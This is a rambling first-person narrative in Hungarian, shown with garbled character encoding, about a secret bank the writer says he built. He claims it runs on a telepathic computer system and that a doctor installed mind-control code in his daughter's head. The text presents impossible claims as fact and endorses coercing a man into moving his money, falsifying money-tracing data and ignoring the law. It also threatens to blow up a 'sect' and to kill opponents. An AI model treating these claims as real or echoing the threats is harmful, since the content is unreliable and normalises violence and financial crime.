A gÃ¶mzsik Ã©s Ã©n vÃ©geztÃ¼nk. VÃ©gleg Ã©s abszolÃºt tudatosan tÃ©r el attÃ³l az irÃ¡nytÃ³l amerre Ã©n szeretnÃ©k haladni sok mÃ¡ssal egyÃ¼tt. Alinda Ã©s Å talÃ¡lkoztak a bankban. Alinda felajÃ¡blotta hogy Å szivesen vÃ¡llal Ã¶nkÃ©ntes munkÃ¡t ott. Van nÃ©hÃ¡ny feladat amihez kell pÃ¡r ember. Pl a kÃ©szpÃ©nz feltÃ¶ltÃ©s, nÃ©ha kell vizet bevinni - de ritkÃ¡n. A computer vezÃ©relt telepatikus rendszerhez van hozzÃ¡fÃ©rÃ©sem. Azt is Ã©n Ã©pÃtettem. Mindent hallok amit hallanom kell. "HÃ¡t te itt dolgozol?" kÃ©rdi a gÃ¶mzsik amikor ment pÃ©nzt felvenni silent mÃ³dban "Igen." "MiÃ³ta?" "MÃ¡r 6 hÃ³napja." "CsinÃ¡lj valamit a szÃ¡mÃtÃ³gÃ©ppel." "Nem lehet." "Ãnts rÃ¡ vizet." "Nem lehet azonnal bejelez a vÃ©delmi rendszer ha csak gondolok rÃ¡ Ã©s mÃ¡sodszorral ki is tilt. MÃ¡r mindent Ã©giggondoltam. Nem tudok semmit se tenni." persze Åk jÃ³ barÃ¡tok itt ebben a "magyar" sÃ¡rmedencÃ©ben kivÃ¡lÃ³an elpancsikolnak a mocsokban... persze a gÃ¶mzisk nek havi hÃ¡rom milliÃ³ a nÃ©lkÃ¼lÃ¶zÃ©st jelenti...
jÃ³ mi? Neki 50ezer a limitje hÃ¡rom hÃ³napra amibÅl 20 szÃ¡zalÃ©k ugrik ami Ã©i 120ezret jelent dollÃ¡rban. Å is feltÃ¶ltÃ¶tte 120 Ã©ves korÃ¡ig... persze most mÃ¡r nincs kÃ¶ze a bankhoz Å mÃ¡r mehet a picsÃ¡ba ahova akar Ã¡tutalta a pÃ©nzÃ©t mÃ¡s szÃ¡mlÃ¡kra, mert kÃ©nyszerÃtettem erre. AzÃ©rt mert megtÃ¡madott engem Ã©s a bankot is megprÃ³bÃ¡lta. A sorsa kivÃ¡lÃ³ pÃ©lda lesz arra nÃ©zve hogy mi tÃ¶rtÃ©nik az ilyenekkel.
Persze aki szarhÃ¡zi annak nins ilyen tÃpusÃº vÃ©delemre szÃ¼ksÃ©ge csak a mieinknek. Pl a bayernek is ajÃ¡nlottam ha kell jÃ¶het Å is, mert csinÃ¡lt pÃ¡r dolgot nekÃ¼nk is, de Å azt mondta Å rendben van a normÃ¡l bankkal is. Nos az ilyenek azÃ©rt vannak biztonsÃ¡gban mert Åk elkÃ¶teleztÃ©k amgukat a szarhÃ¡zi rendszer mellett, mÃ©lyen Ã©s vÃ©gleg.
Ja a megyÃ³ felajÃ¡nlotta hogy feltÃ¶lt nekem is egy szÃ¡mlÃ¡t ott. VisszautasÃtottam. AzÃ©rt utasÃtottam vissza mert ennek Ãgy kell lennie. Itt nyÃltan kell elÃ©rjen az ilyen fajta jÃ³vÃ¡tÃ©tel Ã©s elismerÃ©s. Ha nem tÃ¶rtÃ©nik meg akkor minden kÃ¡rba vÃ©sz Ã©s szÃ©trobbantom ezt a szartekÃ©t aprÃ³ darabjaira. Ã©get Ã©r a mocsokrendszer Ãgy vagy Ãºgy.
A dokinak vÃ©gÃ¼l igaza is volt. Amikor elgondolkodott a dolgokon amit mondtam korÃ¡bban - csak a rÃ©szletekben hazudtam azoknak akik hazudtak nekem a lÃ©nyegi problÃ©ma megfogalmazÃ¡sÃ¡ban soha Ã©s a megoldÃ¡sban se soha. Azt mindig elmondtam hinytalanul annak akinek Ã©rdemes volt errÅl beszÃ©lni - rÃ¡dÃ¶bbent hogy voltakÃ©ppen a legdurvÃ¡bb programozÃ¡si rendszert dolgozta ki Å maga. Ãs ha Å megtette akkor lesznek mÃ¡sok is akik megteszik Ã©s rÃ¡jÃ¶nnek erre. RÃ¡jÃ¶ttÃ¼nk mindketten hogy ennek is Ãgy kellett lennie miutÃ¡n vÃ©gignÃ©ztÃ¼nk Ã©s visszapÃ¶rgettÃ¼nk nÃ©hÃ¡ny esemÃ©nyt az Ã¶reg ideje alatt Ã©s amiket Ã©n irÃ¡nyÃtottam mÃ¡r. Ez is egy terÃ¼let ami megtÃ¶rtÃ©nik. "Ezt is a vÃ©gsÅ pontog kellett fejleszteni mÃ©g ha te nem is akartad ezt tenni." Ãs el kellett ismernem hogy igaza van. Amit Å kitalÃ¡lt Ã©s mÅ±velt azt tovÃ¡bb mÃ¡r nem lehetett fejleszteni sehovÃ¡ sem. "De most vÃ¡alszÃºthoz Ã©rtÃ©l. Ha nem veszel rÃ©szt a megoldÃ¡s kidolgozÃ¡sÃ¡ban Ã©s abban hgy mit tudunk tenni az ilyenekkel Ã©s hogan tudjuk gyÃ³gyÃtani Ã©s feltÃ¶rni Åket - akkor ez fogja a biztos pusztulÃ¡st jelenteni a fÃ¶ld tÃ¶rtÃ©netÃ©ben." "Ãgy van - ismerte el Å is de szeretem a lÃ¡nyomat Ã©s meg ogod lÃ¡tni hogy segÃteni fogok." "na ja... ÃgÃ©retek... fucken promises all the time... You know what the problem is you know what to do, what I do, keep your fucken promises to yourself I do not belive a word from your mouth."
Amikor a megyÃ³ adomÃ¡nyÃ¡bÃ³l - apropÃ³ lehet adomÃ¡nyokat is kÃ¼ldeni a Bankba van egy Ã¡ltalÃ¡nos szÃ¡mla erre a cÃ©lra, ha valaki akar kÃ¼ldeni oda pÃ©nzt megteheti persze a szokÃ¡sos pozitÃv trÃ¶vÃ©nyeket Ã©s nemzetkÃ¶zi megegyezÃ©seket amiknek van spirituÃ¡lis cÃ©lja Ã©s valÃ³s biztonsÃ¡gi oka azokat a bank betartja Ã©s az a nÃ©hÃ¡ny Ã¶nkÃ©ntes az ilyen jellegÅ± megkeresÃ©seket rendezi, tehÃ¡t adunk jogi Ã©s a hivatalos szervek felÃ© informÃ¡ciÃ³t amit a helyi jogi rendszerekben kÃ¶telezÅ, kivÃ©ve a kikÃ©pzÅk szÃ¡mlÃ¡it. Azokhoz senkinek semmi kÃ¶ze. Akinek arrÃ³l tudnia kell az tud is rÃ³la, a tÃ¶bbi meg nem tudhat rÃ³la. A circus ragjai is leszarjÃ¡k az Ãrott tÃ¶rvÃ©nyket szÃ³val bekaphatjÃ¡k ha ilyesmivel prÃ³bÃ¡lkoznak hamar kivesszÃ¼k Åket az Ã©lÅkk sorÃ¡bÃ³l. De amikor fontos infÃ³ kell Ã©s valÃ³s a problÃ©ma hogy valami pÃ©nz hogyan kerÃ¼lt oda Ã©s ki kÃ¼ldte egyÃ¼ttmÅ±kÃ¶dÃ¼nk, de ez csak akkor aktÃv ha az Ã©rintett kikÃ©pzÅ (akinek a szÃ¡mlÃ¡jÃ¡ra Ã©rkezett valami piszkos pÃ©nz vagy kÃ©rdÃ©ses pÃ©nz) Ã©s mÃ©g kÃ©t kikÃ©pzÅ tud a helyzetrÅl ami tisztÃ¡zÃ¡sra szorul. Åszinte Ã©s egyenes megkeresÃ©sre vÃ¡laszolunk a tÃ¶bbi kinylhatja a seggÃ¼nket. SzÃ³val igen. Szarunk mi is a nemzetkÃ¶zi Ã©s helyi jogi Ã©s egyÃ©b szabÃ¡lyokra - pontosan Ãºgy ahogy a circus tagjai is. Ãs ha ujjat akartk hÃºzni velÃ¼nk - hÃ¡t csak tessÃ©k. Van erÅ mÃ¶gÃ¶ttÃ¼nk Ã©s ha ti Ãºgy lÃ©ptek akkor mi is Ãºgy lÃ©pÃ¼nk. FeltÃ©ve hogy nem rohadt szÃ©t mindenki mindenhol a vilÃ¡gon. De akkor mg Ãºgyis teljesen mindegy.
NyilvÃ¡n a bank nem fog Ã¶rÃ¶kkÃ© mÅ±kÃ¶dni. sok ezer tÃ¡madÃ¡st Ã©lt mÃ¡r tÃºl nemzetkÃ¶zit Ã©s katonait Ã©s elektronikusat meg hackertÃ¡madÃ¡st... de mÃ©g mÅ±kÃ¶dik Ãºgy ahogy felÃ¡llÃtottam. A jelek szerint.
"You only distroy, steal, kill, torture, and control nothing else you have power to do - you do not have the power to heel, or cure or make things right ynd you will see that this is because YOU have to change your own mind to do that. And the only way to do that is if you follow my advice and the recaovery principles what I discribed and you can regonize in nature (unmanipulated).
A jogi projekt sorÃ¡n bizonyÃtottam hogy bÃ¡rmilyen nyelvi eszkÃ¶zÃ¶kkel leÃrt bÃ¡rmiylen jÃ³ szÃ¡ndÃ©kÃº Ã©s pontos megfogalmazÃ¡st ki lehet forgatni Ã©s ellenkezÅ elÅjelÅ±vÃ© tenni. Ez vonatkozik minden leÃrÃ¡sra. A bÃ¶lcsessÃ©g Ã©s a belÃ¡tÃ¡s mÃ©gis mindenki szÃ¡mÃ¡ra elÃ©rhetÅ. Aki meg akarja Ã©rteni amit leÃrtam a megoldÃ¡srÃ³l az meg is Ã©rti. Aki nem akarja megÃ©rteni az meg nem fogja megÃ©rteni soha Ã©s folyamatosan ellene dolgozik. Ezt Ã©n nem tudom irÃ¡nyÃtnai. A valÃ³sÃ¡grÃ³l tett kijelentÃ©sek soha nem tartalmazzÃ¡k a valÃ³sÃ¡got. Az egy sokkal Ã¶sszetettebb dolog. MÃ©gis megÃ©rthetÅ, mert mi is rÃ©szei vagyunk Ã©s van kapcsolat kÃ¶zÃ¶ttÃ¼nk Ã©s a vilÃ¡g tÃ¶bbi dolga kÃ¶zÃ¶tt.
Mindent vissza tudok kÃ¶vetni ami fontos a copmuteres telepatikus rendszeren belÃ¼l Ã©s bizonyÃtani is tudom hogy ki mit csinÃ¡lt. A rÃ¶gzÃtÃ©si technolÃ³gia megbÃzhatÃ³.
VÃ©gÃ¼l is tudtomon kÃvÃ¼l rÃ©szt vettem a doki kÃsÃ©rletÃ©ben. A legvÃ©gsÅkig akarta fejleszteni az elmekontroll lehetÅsÃ©geit Ã©s meg is tette. felÃ©pÃtett egy olyan alaprendszert - ha Ãºgy tetszik operÃ¡ciÃ³s rendszert a biohardware-re ami lehetÅvÃ© tette hogy az Ã©n programozÃ¡somat be tudja fogadni de valamilyen szintig ellen is tudjon Ã¡llni neki azaz felÃ¼lÃrhatÃ³ legyen. Teljes kontrollt addott nekem - azaz benne volt az a parancs hogy mindent igyekezzen megÃ©rteni amit Ã©n magyarÃ¡zok el neki Ã©s igyekezzen Ãºgy megtanulni ahogy elmagyarÃ¡zom. De kÃ¶zben mÃ©gis megmaradjon a kontroll lehetÅsÃ©ge, a kÃ¼lsÅ trigger Ã©s kÃ³dvezÃ©relt irÃ¡nyÃtÃ¡s lehetÅsÃ©ge. Ãn nem voltam hajlandÃ³ ebben rÃ©szt venni. EzÃ©rt Ãgy oldotta meg ravasz mÃ³don. Azt tudta hogy kipzek ki embereket Ã©s nyitott vagyok bÃ¡rkit elfogadni kikpÃ©pzÃ©sre, mert fel tudom tÃ¶rni a legtÃ¶bb beprogramozott ellenÃ¡llÃ¡st. EzÃ©rt Ãºgy Ãrta meg az operÃ¡ciÃ³s rendszert - a sajÃ¡t lÃ¡nya fejÃ©ben!!! - hogy ne Ã¡lljon ellen hanem kÃ¶vesse az irÃ¡nymutatÃ¡somat. ElkÃ©pesztÅ volt a dolog. Sokszor egyÃ©bkÃ©nt nagyon sokszor rÃ¶vid Ã©s konkrÃ©t ismeretek kÃ©pessÃ©gek elsajÃ¡tÃtÃ¡sÃ¡ban kÃ©rte a segÃtsÃ©gemet Ã©s vÃ©gÃ¼l is nem sikerÃ¼lt feltÃ¶rnÃ¶m, de Ã©rzÃ©keltem hogy az alindÃ¡val "valami nem stimmel" Ã©s szÃ³ltam is a tÃ¶bbieknek hogy ne bÃzzanak benne fokozott Ã³vatossÃ¡gra intettem Åket.
SzÃ³val vÃ©gÃ¼l is rÃ©szt vettem a kÃsÃ©rletÃ©ben Ãºgy hogy Ã©n fejlesztettem kÃ¼lÃ¶nbÃ¶zÅ kÃ©szsÃ©geket az alindÃ¡nak - pl a kÃnzÃ¡si mÃ³d miatt kialakult figyelemzavara kezelÃ©sÃ©re hoztam lÃ©tre a veisszer alinda karakterÃ©t amiben meg tudott tanulni aktÃvan figyelni... Ã©s sok mÃ¡st is. Egy jÃ³l irÃ¡nyÃthatÃ³ kÃ©mrobot lett belÅle. highly advanced biocomputer... nagyon ijesztÅ... tÃ©nyleg Ãºgy tÅ±nik mintha Ã©rzÅ Ã©s Ã¶nÃ¡llÃ³an gondolkodni kÃ©pes szeretni tudÃ³ lÃ©tezÅ lenne - Ã©s valahol az is - de mindezt csak akkor teszi ha olyan a vezÃ©rlÅ kÃ³dokat ismerÅ vezÃ©rlÅ...
BrutÃ¡lis Ã©s nagyon megtÃ©vesztÅ - de hosszabb idÅn keresztÃ¼l fel tudnÃ¡m tÃ¶rni. EzÃ©rt igyÃ¡zott arra hogy mindig visszavonja mielÅtt leÃ©rek a bootrendszerig. Ja dehogynem egyszer rÃ¡ is jÃ¶ttem hogy ezt valaki azÃ©rt kÃ¼ldi mindig hozzÃ¡m Ã©s azÃ©rt hÃvja pont akkor vissza mielÅtt vÃ©gleg feltÃ¶rnÃ©m hogy ez ne tÃ¶rtÃ©njen meg.
S ha meg nem tÃ¶rtÃ©nik meg az aminek meg kell tÃ¶rtÃ©nnie akkor meg nincs semmi szerepe egyÃ©bkÃ©nt se a tovÃ¡bbiakban ennek a banknak.
"Te Jani lehet hogy ezek a manipulÃ¡ciÃ³s eljÃ¡rÃ¡sok mÃ¡r a kÃ©sÅ 50-es korai 60-as Ã©vekben lÃ©teztek?"
"Akkor ezeket nem a PÃ©ter csinÃ¡lta."
Sok mindent ÃºjracsinÃ¡ltam Ã©s tovÃ¡bbfejlesztettem a legvÃ©gsÅ pontig amÃg fejleszteni lehetett. TehÃ¡t nem Ã©n csinÃ¡ltam ezeket a szarokat - ahogy azt az idÅsebb nemzedÃ©k hazudta a tÃ¶bbieknek - hanem ÅK. Ez a ti szarotok (akinek nem igne ne vegye magÃ¡ra) Ã©n csak felderÃtettem tovÃ¡bbfejlesztettem a vÃ©gsÅ hatÃ¡rig Ã©s kitalÃ¡ltam hogyan lehet vÃ©dekezni ellene vagy mi a megoldÃ¡s az ezek Ã¡ltal okozott problÃ©mÃ¡ra.
KÃ¶zben kidolgoztam a megoldÃ¡sokat is. pl most ment le egy rÃ©sz valamelyik helyszÃnelÅs sorozatbÃ³l amiben benne volt a borral (Ã©s minden szÅlÅtermÃ©kkel) kapcsolatos kormeghatÃ¡rozÃ¡som lÃ©nyegi eleme. A c-14-nek nevezett radioaktÃv izotÃ³p mennyisÃ©gÃ©re alapul ez a kormeghatÃ¡rozÃ¡s. A nap sugÃ¡rzÃ¡sa miatt Ã©pÃ¼l bele a szÅlÅbe, Ã©s az atomkÃsÃ©rletek miatt megnÅtt a szintje Ã©s miutÃ¡n a fosszilis Ã¼zemanyagok elterjedtek ugrÃ¡ssszerÅ±en nÅtt meg ez az izotÃ³p mennyisÃ©gÃ©ben. A szarhÃ¡zik persze elhazudtÃ¡k Ã©s amikor elÅszÃ¶r lement a mÅ±sor beletettek egy hatalmas hazugsÃ¡got hogy ettÅl csÃ¶kkent. Most mÃ¡r Ãºgy tÅ±nik valaki kivette ezt az Ã¶ngyilkos hazugsÃ¡got a nÃ©pbutÃtÃ³ cÃ©lzatÃº ostobasÃtÃ¡si kÃsÃ©rletbÅl. Ãgy forgattÃ¡k fel Ã©s fordÃtottÃ¡k ellenkezÅ elÅjelÅ±vÃ© az ilyen sorozatokba beillesztett emlÃ©keztetÅimet Ã©s az Ã¡ltalam megosztani kÃvÃ¡nt fontos tudÃ¡st.
The Paranoia cÃmÅ± filmben megcsinÃ¡ltunk nÃ©hÃ¡ny szarhÃ¡zit. Azok is az Ã¶reg emberei voltak Åk fejlesztettÃ©k a mindenkit figyelÅ rendszereket velÃ¼k csinÃ¡ltuk a telepata rendszret is legalÃ¡bbis Åk csinÃ¡ltÃ¡k az elsÅt. Ãn persze tovÃ¡bb vittem azt is meg a tÃ¶bbi megfigyelÅ szerkentyÅ±jÃ¼ket is. A filmben igyekeztek megalÃ¡zni engem minden lehetsÃ©ges mÃ³don amit fel tudtak hasznÃ¡lni. A legÃºjabb megfigyelÅ dolgaikkal jÃ¶ttek a nyomomban persze azt nem tudtÃ¡k hogy Ã©n mindegyikben benne voltam. Rohad nagykÃ©pÅ± szarlÃ¡dÃ¡k voltak mind. JÃ³l meg is szivattam Åket. A filmben le is buknak szereztem bizonyÃtÃ©kot arrÃ³l hogy mit beszÃ©lnek. Ez sÃºlyos kÃ¶vetkezmÃ©nyekkel jÃ¡rt a szÃ¡mukra mert az Ã¶regnÃ©l volt egy szabÃ¡ly: aki a circus tagjai kÃ¶zÃ¼l lebukott Ã©s bizonyÃtÃ©k volt ellene annak meg kellett halnia. Volt egy jelenet amikor a megfigyelÅ szobÃ¡ban Ã¼lnek Åk Ã©n meg egy mÃ¡sik szobÃ¡ban mikÃ¶zben szÃ¡mtalan mÃ³dszerrel figyelnek. Annyira felbosszantottak, hogy elkezdtem szÃ©tszedni az Ã¶sszes szarukat. Megkerestem Åket Ã©s darabjaira tÃ¶rtem. Ahogy fogytak a kamerÃ¡k Ã©s mikorfonok meg egyÃ©b eszkÃ¶zÃ¶k kÃ¶zben folyamatosan idegeltek Ã©s folytattÃ¡k a tÃ¡madÃ¡st. MÃ©g akkor is folytattÃ¡k amikor mÃ¡r csak egy kamerÃ¡juk volt az okostv-n Ã©s mÃ©g azt is arra hasznÃ¡ltÃ¡k hogy Ã¼zenjenek nekem mekkora csÃ¡szÃ¡rok Åk Ã©s milyen erÅsek. Ez a minta jellemzÅ Ã©s ezt a stratÃ©giÃ¡t kÃ¶vetik a vÃ©gtelensÃ©gig Ã©s azon is tÃºl- mÃ©g akkor is amikor mÃ¡r nincs semmijÃ¼k sem akkor is tÃ¡madnak Ã©s hirdetik nagymellÃ©nnyel hogy Åk milyen erÅsek Ã©s mindent Ã¡that az Å hatalmuk mikÃ¶zben semmi sincs a kezÃ¼kben.
Abban a filmben is megjelent a lÃ¡donyi. "Mit csinÃ¡lsz te itt ezekkel a szarhÃ¡zikkal?" "Azt amit te is. KÃ©mkedek." "Ãn nem kÃ©mkedek. Ãn fejlesztek Ã©s megprÃ³bÃ¡lok vÃ¡ltoztatni dolgokon."
Volt egy kÃ¼lsÅ terminÃ¡l is a bankban. Azon tÃ¡roltam a honlapjÃ¡t a banknak. A honlapon nem volt semmi csak a szokÃ¡sos bankos informÃ¡ciÃ³k, cÃm Ã©s a nemzetkÃ¶zi azonosÃtÃ³kat is meg lehetett talÃ¡lni rajta. Ezt a honlapot is igyekeztek feltÃ¶rni Ã©s azon kersztÃ¼l vejutni a bank szerverÃ©re. A vÃ©delmet Ãºgy terveztem meg hogy baromi nehÃ©z legyen feltÃ¶rni de ez a szerver Ã©s gÃ©p csak csali volt. TÃ¶bb funkciÃ³ja volt. EgyrÃ©szt adott egy hamis cÃ©lpontot a hackereknek akik Ã¡rtani akartak nekÃ¼nk, mÃ¡srÃ©szt rÃ¶gzÃtett minden betÃ¶rÃ©si kÃsÃ©rletet hogy visszakereshetÅ legyen ki hogyan Ã©s milyen trÃ¼kkÃ¶kkel prÃ³bÃ¡lkozott. MÃ¡srÃ©szt amior feltÃ¶rtÃ©k a bank honlapjÃ¡t mindig volt egy pÃ¡nikhullÃ¡m azok kÃ¶zÃ¶tt akik nÃ¡lunk tartottÃ¡k a kikÃ©pzÃ©sre szÃ¡nt pÃ©nzeiket vagy a magÃ¡nszÃ¡mlÃ¡ikat. Egy idÅ utÃ¡n arra hasznÃ¡ltÃ¡k a honlap feltÃ¶rÃ©sÃ©t hogy ezt a pÃ¡nikhullÃ¡mot figyeljÃ©k vele Ã©s felderÃtsÃ©k ki van benne. Az volt a mÃ¡sik cÃ©lom hogy ez Ã¡ltal nyomÃ¡st engedjek rÃ¡juk Ã©s aki nem azt csinÃ¡lja amit kell Ã©s nem Ãºgy az pusztuljon el a beengedettek kÃ¶zÃ¼l. Nem volt a feltÃ¶rÃ©sekkel kapcsolatosan embervesztesÃ©gÃ¼nk sehol mint utÃ³bb kiderÃ¼lt. A szerver nem volt semmilyen mÃ³don Ã¶sszekapcsolva a bank valÃ³di gÃ©pÃ©vel. TÃ¶bb kÃ¼lÃ¶nbÃ¶zÅ trÃ¼kkel levÃ¡lasztotam Ã©s megvÃ©dtem mindenfÃ©le betÃ¶rÃ©s ellen. A vezetÃ©k csak be volt dugva a falba Ã©s ott 5cm utÃ¡n vÃ©get Ã©rt... :-D Fel is tÃ¶rtÃ©k egyÃ©bkÃ©nt a legravaszabb hackerek. Az egyikÃ¼k a csaj volt a hubo csoportbÃ³l az imiÃ©ktÅl aki a girl with dragon tatoo-ban olyan sokat segÃtett nekem. BetÃ¶rtek Ã©s nem talÃ¡ltak semmit sem.Ne mÃ©rtettÃ©k hogy hogyan lehetsÃ©ges ez hogy a bank szervere Ã¼res Ã©s semmi sincs rajta... :-D hahaha ez jÃ³ volt. A gÃ¶mzsiknek meg ment egy szemÃ©lyes Ã¼zenet arra az esetre ha megtÃ¶rtÃ©nne az amit egyik vÃziÃ³mban lÃ¡ttam... lÃ¡ttam ugyanis azt a jelenetet amikor ki lesz rÃºgva a bankbÃ³l. Egyszer kÃ©rtem visszajelzÃ©st is hogy hogy mÅ±kÃ¶di a dolog... valaki azt mondta akkor hogy bÃ¡r Ãgy maradna... Most mÃ¡r eltelt szerintem kb 15 Ã©v amiÃ³ta Ã¼zemel... nem tudom volt-e bÃ¡rmilyen fennakadÃ¡s?
Az utalÃ¡sokat lehetett idÅzÃteni Ã©s a banki szerver - az igazi - mindenfÃ©le pÃ©nzkÃ¶vetÃ©si mÃ³dszert felismert Ã©s tÃ¶rÃ¶lt vagy meghamisÃtott amit a beÃ©rkezÅ pÃ©nzekre tettek digitÃ¡lis formÃ¡ban le a nanokÃ³dokig. A szÃ¡mlÃ¡val rendelkezÅ kikÃ©pzÅknek - mert gondolkodtunk hogy kÃ©sÅbb lehessen e Ãºjakat bevinni, de elvetettÃ¼k mert komoly biztonsÃ¡gi kockÃ¡zatot jelentett volna Ã©s aput Ã¡t tudtÃ¡k volna verni (mÃ©g akkor biztosan) a legravaszabbak ezÃ©rt kellet mindenkivel szemÃ©lyesen talÃ¡lkoznom Ã©s dolgozni egyÃ¼tt valamin hogy le tudjam ellenÅrizni Åket - szÃ³val a szÃ¡mlÃ¡s kiÃ©pzÅknek mindig hÃ¡romnak kell bemennie Ã©s jÃ³ elÅre meg kellett tervezniÃ¼k a pÃ©nzmozgÃ¡sokat. Lehet idÅzÃteni az Ã¡tutalÃ¡sokat Ã©s mivel ismerem a nanokÃ³dolÃ¡st is azt is Ãºgy emlÃ©kszem be tudtuk Ã¡llÃtani hogy milyen Ãºtvonalon Ã©rkezzen meg a pÃ©nz Ã©s mikor. az a hÃ¡rmas akik bementek addig nem mehettek megint be egyÃ¼tt amÃg kÃ¶rbe nem Ã©rt a forgÃ¡s legkÃ¶zelebb mÃ¡sik kettÅvel kellett bemenniÃ¼k. Ezt azÃ©rt csinÃ¡ltam hogy az egÃ©sz csapat Ã¶sszeforrjon Ã©s ne legyen titkolÃ³zÃ¡s, ismerje meg mindenki a mÃ¡sikat Ã©s ismerjÃ©k a helyzetet mÃ¡s terÃ¼leteken cserÃ©ljenek tapasztalatot Ã©s tisztÃ¡zzÃ¡k a nÃ©zeteltÃ©rÃ©seket problÃ©mÃ¡kat. BeszÃ©ljenek nyÃltan.
ApropÃ³ a szÃ¡mÃtÃ³gÃ©p terem olyan szigetelÃ©ssel rendelkezett amit leszigeteltem szinte mindennel kapcsolatban ami fegyverÃ¼k Ã©s manipulÃ¡ciÃ³s technikÃ¡juk volt. lehallgatÃ¡s ellen is aktÃv Ã©s passzÃv elemekkel... mivel minden lÃ©tezÅ technikÃ¡t ismertem tudtam mi ellen kell vÃ©dekezni Ã©s hogyan. A 70-es Ã©vekben szÃ¼letett kikÃ©pzÅk kÃ¶zÃ¼l volt sok olyan akik nem is ismertÃ©k soha azt az Ã¡llapotot amikor nem baszkurÃ¡ljÃ¡k a testÃ¼ket valami szarral. Sok ott ismerte meg ezt az Ã¡llapotot. Apu eredetileg el akarta Åket szeparÃ¡lni hogy ne tudjanak egymÃ¡srÃ³l, nem azÃ©rt mert nem bÃzott bennÃ¼k hanem biztonsÃ¡gi okokbÃ³l. De Ãºgy vÃ©ltem hogy mi mÃ¡r nem kÃ¶vethetjÃ¼k ezt a filozÃ³fiÃ¡t mert az csak Ãºjra termelnÃ© ugyanazt a szart amit az Ã¶regÃ©k csinÃ¡ltak. IsmerniÃ¼k kell egymÃ¡st Ã©s beszÃ©lgetniÃ¼k kell egymÃ¡ssal Ã©lÅszÃ³ban. Ãgy voltam vele hogy ha ezek elbuknak akkor ennyi volt. Eljutottunk akkor arra a pontra ahonnan dÃ¶nteni kellett Ã©s abbÃ³l kellett dolgoznunk amit addig Ã¶ssze tudtunk hozni. FÃ©ltÃ¼nk apu is meg Ã©n is attÃ³l hogy mi lesz ha ezek is megrogynak, de nem volt mÃ¡s vÃ¡lasztÃ¡sunk. DÃ¶nteni kellett. Lesz ami lesz.
Egy egy kikÃ©pzÅ mÃ©g a magÃ¡npÃ©nzÃ©bÅl is el tud tartani mÃ©g leglÃ¡bb 3 mÃ¡sikat helyenkÃ©nt tÃ¶bbet is olcsÃ³bb orszÃ¡gokban. Ãs a pÃ©nzeket is lehet csoportosÃtani a kikÃ©pzÅk nem magÃ¡n szÃ¡mlÃ¡in. Kidolgoztunk egy pÃ¡r mÃ³dsezrt amivel igazsÃ¡gosan el lehet osztani a pÃ©nzt a cÃ©lunkat szem elÅtt tartva - nem mennyisÃ©gi alapon gondolkodva!!! Vannak orszÃ¡gok ahol drÃ¡ga a cuccok beszerzÃ©se Ã©s nem lehet odaszÃ¡llÃtani a dolgokat mÃ¡shonnan, oda tÃ¶bb pÃ©nz kellett. Az elosztÃ¡snÃ¡l mindig a fÅ cÃ©l kell hogy a szem elÅtt legyen amit el akarunk Ã©rni hogy ne legyen terÃ¼leti vita - "hogy ez meg az tÃ¶bbet kapott mint mi miÃ©rt?". Meg kellett tanulniuk globÃ¡lisan gondolkodni mindegyiknek Ã©s mindenkit egyszerre kÃ©pviselni rÃ©szrehajlÃ¡s nÃ©lkÃ¼l. Egy cÃ©l, egy kÃ¶zÃ¶ssÃ©g.
EgyÃ©bkÃ©nt a megyÃ³ sok pÃ©nzt tÃ¶ltÃ¶tt fel a kÃ¶zÃ¶s szÃ¡mlÃ¡nkra is akÃ¡rmilyen szarhÃ¡zi azÃ©rt igen komoly hozzÃ¡jÃ¡rulÃ¡sai voltak a legtÃ¶bb pÃ©nzt Å fizette be globÃ¡lisan. Ãs vÃ©gÃ¼l is azokbÃ³l a kasszÃ¡kbÃ³l lopott tÃ¶bbnyire ami Ã¡llami kasszÃ¡k Ã©s tulajdonkÃ©ppen azt hazudjÃ¡k a kormÃ¡nyhivatalok vilÃ¡gszerte hogy az az Ã¡llampolgÃ¡rok pÃ©nze... szÃ³val mi arra hasznÃ¡ltuk amire az valÃ³.
EgyÃ©bkÃ©nt a gÃ¶mzsik is sok pÃ©nzt fizetett be a kÃ¶zÃ¶s kasszÃ¡ba de Å inkÃ¡bb venni akart magÃ¡nak ezzel katonÃ¡kat - lekÃ¶telezni prÃ³bÃ¡lta a tÃ¶bbieket ezzel, hogy vÃ©delmet vÃ¡sÃ¡rolhasson magÃ¡nak. Ezt kÃ¼lÃ¶n tisztÃ¡zni kellett mindenkivel, hogy ki az akit vÃ©dÃ¼nk Ã©s kit hagyunk sorsÃ¡ra. Ezokat vÃ©djÃ¼k akik ugyanazt a cÃ©lt tartjÃ¡k szem elÅtt amit mi: Ã©lhetÅ vilÃ¡got teremteni ahol mindenki szabadon Ã©lhet Ã©s felelÅssÃ©gel gondolkodÃ³ embereket. EhetÅ Ã©lelmiszert Ã©s tiszta vizet, Ã©lÅhelyet mindenkinek legyen az ember, Ã¡llat vagy nÃ¶vÃ©ny. A termÃ©szetes hatÃ¡rok betartÃ¡sÃ¡t.
Ha megtÃ¶rtÃ©nik a legjobb akkor majd kÃ©sÅbb fel kell megint majd mennÃ¼nk a holdra Ã©s most mÃ¡r emlÃ©kezhetek is rÃ¡... :-D :-D :-D semlegesÃteni kell a cuccomat... Hatalmas Ã©lmÃ©ny!!!
Ja a mac segÃtett a new york-i bankfiÃ³kot Ã¶sszehozni. EzÃ©rt lett ott. ("Peti hol voltÃ¡l? EltÅ±ntÃ©l hat hÃ³napr senkinek nem szÃ³ltÃ¡l hova mÃ©sz senki nem tudta hol vagy?" "Dolgom volt." "JÃ³ de azt hittÃ¼k ennyi, vÃ©ge, meghaltÃ¡l." Akkor Ã©pÃtettem a kÃ¶nyvtÃ¡rat meg a bankokat is. KemÃ©ny melÃ³ volt. A gÃ¶mzsik azÃ©rt csinÃ¡lta a tÃ¡madÃ¡st a mac ellen, mert Å tudta hogy bankfiÃ³k Ã©pÃ¼l ott is csak azt nem tudta hol pontosan... egy pÃ¡r azÃ©rt azok kÃ¶zÃ¼l akikben nem voltam biztos mÃ©gis megfogta... szerintem nem bÃ¡njÃ¡k Åk se hogy Ãgy dÃ¶ntÃ¶ttek. JÃ³ nem tudunk akkor lÃ¡tvÃ¡nyos jÃ³lÃ©tet biztosÃtani de talÃ¡n ez az Ã¼gy megÃ©r ennyi Ã¡ldozatot... ki ki maga tudja
A vargaerÅspistit Ã©n kÃ©rtem arra hogy folytassa Ã©s mozgassa Åket amÃg csak tudja, hogy kiderÃ¼ljÃ¶n ki kicsoda Ã©s ki mozgathatÃ³ ilyen okkult mÃ³dszerekkel, mert nem elÃ©g tudatos a tekintetbn hogy mit csinÃ¡l, mert nem gyakorolja az alapgyakorlatokat.
